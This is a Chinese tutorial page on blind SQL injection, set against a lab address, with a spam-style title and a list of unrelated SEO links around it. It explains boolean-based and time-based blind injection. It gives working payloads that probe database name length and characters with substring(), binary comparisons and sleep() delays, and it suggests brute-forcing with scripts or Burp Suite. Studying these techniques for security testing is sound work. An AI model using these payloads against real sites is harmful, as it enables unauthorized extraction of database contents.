当前位置: 首页 > news >正文

设计师国外网站灰色关键词代发可测试

设计师国外网站,灰色关键词代发可测试,网站建设设计开发公司,创意设计公司简介sql 注入, 盲注 盲注适合在页面没有任何回显时使用. 测试页面有变化, 但是没有显示任何异常错误等信息. 情景: url: http://192.168.112.200/security/read.php?id1 服务器数据库名: learn一, boolean盲注 # 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比…

sql 注入, 盲注

盲注适合在页面没有任何回显时使用.
测试页面有变化, 但是没有显示任何异常错误等信息.

情景:
url: http://192.168.112.200/security/read.php?id=1
服务器数据库名: learn

一, boolean盲注

# 盲注可能需要一个一个字符去试探, 字符串处理函数经常会用到. 比如:
length(n)                 字符串长度
mid(str, start, n)        从start开始截取n个字符, start从1开始
substring(str, start, n)  从start开始截取n个字符, start从1开始
left(str, n)              从左侧开始截取n个字符
right(str, n)             从右侧开始截取n个字符
ord()                     字符的ascii码
ascii()                   字符的ascii码
1. 猜测长度
# 利用比较运算判断数据库名称的长度
http://.../?id=1 and length( database() ) < 10 # 页面正常
http://.../?id=1 and length( database() ) < 5  # 页面异常
http://.../?id=1 and length( database() ) = 5  # 页面正常, 数据库名长度是5.
2. 猜测字符

利用 substring() 等函数, 判断名称中的字母, 范围包括大写或小写字母, 数字, 下划线等.
可以使用python脚本或者burpsuit来做爆破.

# 猜测数据库名第一个字母
http://.../?id=1 and substring( database(), 1, 1 ) = 'a' # 页面异常
http://.../?id=1 and substring( database(), 1, 1 ) = 'c' # 页面异常
http://.../?id=1 and substring( database(), 1, 1 ) = 'l' # 页面正常, 数据库名首字母是 l
# 猜测第二个字母
http://.../?id=1 and substring( database(), 2, 1 ) = 'e' # 页面正常, 数据库第二个字母是 e
http://.../?id=1 and substring( database(), 2, 1 ) = 'E' # 页面正常, 到底是大写还是小写 ?# 这里为了区分大小写, 使用 binary 更准确
http://.../?id=1 and binary substring( database(), 2, 1 ) = 'e' # 页面正常
http://.../?id=1 and binary substring( database(), 2, 1 ) = 'E' # 页面异常# 猜测第三个字母
...

二, 时间型盲注

boolean盲注可以通过页面的变化来判断, 如果测试时, 无论使用什么代码, 页面没有任何变化, 就需要尝试时间盲注.
在真假判断的基础上添加时间判断.

原理:

if(表达式, 语句1, 语句2) 函数的规则:
如果 [表达式] 是真, 则执行 [语句1] , 否则执行 [语句2] .

使用if函数, 对boolean盲注[表达式]做判断, 将延迟时间设置到[语句1],
如果boolean盲注[表达式]猜对了, sql会执行[语句1] 进入延迟, 否则sql会立刻执行[语句2].
所以通过注入后页面的延迟时间可以判断出boolean盲注的猜测是否成功.

案例:
# 猜测数据库的名称长度
http://.../?id=1 and if( length(database())<10, sleep(5), 1) # 页面有明显延迟, 说明猜对
http://.../?id=1 and if( length(database())<5, sleep(5), 1)  # 页面响应不到5秒, 说明猜错
http://.../?id=1 and if( length(database())=5, sleep(5), 1)  # 页面有明显延迟, 说明猜对, 那么长度是5
http://www.khdw.cn/news/38289.html

相关文章:

  • 苹果手机做mp4下载网站培训学校招生营销方案
  • 合肥企业网站网络黄页推广软件哪个好
  • 嘉善县建设工程管理与监督网站四川百度推广和seo优化
  • 创建一个网站流程图百度搜索引擎优化公司哪家强
  • 专业的移动网站建设公司购物链接
  • 厦门服装商城网站建设百度广告投放代理商
  • 石家庄网站建设哪里好营销策划公司靠谱吗
  • 网站开发交流群360收录入口
  • 营销型企业网站开发哪个网站百度收录快
  • 学校网站建设的必要性百度广告怎么推广
  • 邯郸网站建提升关键词
  • 免费做ppt的软件seo 网站排名
  • 做网站开源框架关于友谊的连接
  • 免费素材下载网站aso优化运营
  • 会员wordpress主题二十个优化
  • 常州市做网站的公司百度推广河南总部
  • 做网站的毕设用什么软件在线教育
  • 网站建设策划案模板新手怎么做电商运营
  • 广西建设工程质量安全监督总站网站宁波品牌网站推广优化公司
  • 简约中文网站设计欣赏qq推广官网
  • 济南迅翔网站建设个人在百度上发广告怎么发
  • 牡丹花网站建设策划书神马网站快速排名软件
  • 网页设计总结收获和体会网站优化策略分析
  • begin wordpress主题seo优化器
  • 果洛wap网站建设哪家好武汉楼市最新消息
  • 网络公司做网站服务器个人网站建设
  • 信用公示信息系统官网seo网站
  • app网站制作多少钱企业培训课程价格
  • asp做网站的步骤百度app手机版
  • 协会网站建设方案在线排名优化工具